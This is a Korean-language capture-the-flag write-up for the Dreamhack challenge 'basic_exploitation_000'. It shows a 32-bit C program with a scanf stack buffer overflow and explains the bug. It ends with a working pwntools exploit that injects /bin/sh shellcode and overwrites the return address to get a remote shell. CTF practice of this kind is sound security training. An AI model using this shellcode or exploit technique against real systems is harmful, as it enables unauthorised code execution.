[Pwnable] Basic_exploitation_000

1. Environment

Ubuntu 16.04
Arch:     i386-32-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

2. Code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();
    
    printf("buf = (%p)\n", buf);
    scanf("%141s", buf);

    return 0;
}

 

3. Write Up

main함수를 보면 buf의 크기는 0x80(128바이트) 인데 입력으로 %141s 를 받고 있다. 여기서 BOF 발생 가능

return address 는 BUF[80] 에서 SFP[4] 만큼 떨어진 곳에 존재

따라서 BUF에 쉘코드를 입력한 후 0x84에서 쉘코드만큼의 크기를 뺀 다음 더미값으로 채워주고,

RET에 buf의 주소를 넣어준다면 쉘을 딸 수 있게 된다.

 

여기서 주의할 점은 scanf 로 입력받을 때 인식을 못하는 쉘코드가 존재한다 → 25바이트가 아닌 26바이트 쉘코드 이용

buf값이 계속해서 변하기 때문에 (ASLR) 때문에 nc를 통해 포트 연결을 한 후에 받아오는 buf 값을 buf_add 에 입력하고

payload를 위와 같이 짜보았다.

 

여기서 계속 해서

can only concatenate str (not “bytes”) to str 오류가 발생했는데 이건 python3에서 생기는 오류이다.

ascii 코드를 byte type로 모두 변경하니 오류 해결

 

▷ Exploit Code

from pwn import *

p = remote("host3.dreamhack.games", 8884)

shellcode = b"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"

p.recvuntil("(")
buf_add = int(p.recv(10), 16)

payload = shellcode + b'\x41' * 106 + p32(buf_add)

p.sendline(payload)
p.interactive()